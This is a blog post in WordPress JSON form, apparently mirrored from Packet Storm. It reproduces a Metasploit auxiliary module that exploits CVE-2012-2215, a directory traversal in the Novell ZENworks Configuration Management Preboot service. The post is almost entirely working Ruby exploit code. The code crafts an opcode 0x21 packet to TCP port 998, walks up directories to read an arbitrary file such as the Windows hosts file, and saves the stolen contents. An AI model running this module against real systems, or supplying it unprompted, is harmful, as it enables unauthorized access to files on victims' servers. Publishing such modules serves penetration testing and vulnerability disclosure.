{"id":59370,"date":"2024-09-01T21:29:57","date_gmt":"2024-09-01T18:29:57","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181219\/zenworks_preboot_fileaccess.rb.txt"},"modified":"2024-09-01T21:29:57","modified_gmt":"2024-09-01T18:29:57","slug":"novell-zenworks-configuration-management-preboot-service-remote-file-access","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/novell-zenworks-configuration-management-preboot-service-remote-file-access\/","title":{"rendered":"Novell ZENworks Configuration Management Preboot Service Remote File Access"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner<\/p>\n

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘Novell ZENworks Configuration Management Preboot Service Remote File Access’,
‘Description’ => %q{
This module exploits a directory traversal in the ZENworks Configuration Management.
The vulnerability exists in the Preboot service and can be triggered by sending a specially
crafted PROXY_CMD_FTP_FILE (opcode 0x21) packet to the 998\/TCP port. This module has been
successfully tested on Novell ZENworks Configuration Management 10 SP2 and SP3 over Windows.
},
‘License’ => MSF_LICENSE,
‘Author’ =>
[
‘Luigi Auriemma’, # Vulnerability Discovery
‘juan vazquez’ # Metasploit module
],
‘References’ =>
[
[ ‘CVE’, ‘2012-2215’ ],
[ ‘OSVDB’, ‘80230’ ],
[ ‘URL’, ‘https:\/\/web.archive.org\/web\/20121103122235\/http:\/\/www.verisigninc.com\/en_US\/products-and-services\/network-intelligence-availability\/idefense\/public-vulnerability-reports\/articles\/index.xhtml?id=975’ ]]))<\/p>\n

register_options(
[
Opt::RPORT(998),
OptString.new(‘FILEPATH’, [true, ‘The name of the file to download’, ‘\\\\WINDOWS\\\\system32\\\\drivers\\\\etc\\\\hosts’]),
OptInt.new(‘DEPTH’, [true, ‘Traversal depth’, 6])
])
end<\/p>\n

def run_host(ip)
# No point to continue if no filename is specified
if datastore[‘FILEPATH’].nil? or datastore[‘FILEPATH’].empty?
print_error(“Please supply the name of the file you want to download”)
return
end<\/p>\n

travs = “\\\\..” * datastore[‘DEPTH’]travs << “\\\\” unless datastore[‘FILEPATH’][0] == “\\\\”
travs << datastore[‘FILEPATH’]\n

payload = Rex::Text.to_unicode(travs)
packet = [0x21].pack(“N”) # Opcode
packet << [payload.length].pack(“N”) # Length
packet << payload # Value<\/p>\n

connect
sock.put(packet)
sock.get_once(4, 1)
length = sock.get_once(4, 1)<\/p>\n

unless length
print_error(“Unable to get length due to a timeout”)
return
end<\/p>\n

sock.get_once(0x210-8, 1)
contents = sock.get_once(length.unpack(“V”).first, 1)<\/p>\n

unless contents
print_error(“Unable to extract contents due to a timeout”)
return
end<\/p>\n

disconnect<\/p>\n

print_good “File retrieved successfully!”
fname = File.basename(datastore[‘FILEPATH’])
path = store_loot(
‘novell.zenworks_configuration_management’,
‘application\/octet-stream’,
ip,
contents,
fname
)
print_status(“File saved in: #{path}”)
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::Tcpinclude Msf::Auxiliary::Reportinclude Msf::Auxiliary::Scanner def initialize(info = {})super(update_info(info,‘Name’ => ‘Novell ZENworks Configuration Management Preboot Service Remote File Access’,‘Description’ => %q{This module exploits a directory traversal in the ZENworks Configuration Management.The vulnerability exists in the Preboot service and can be triggered by sending a …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59370","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59370","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59370"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59370\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59370"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59370"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59370"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}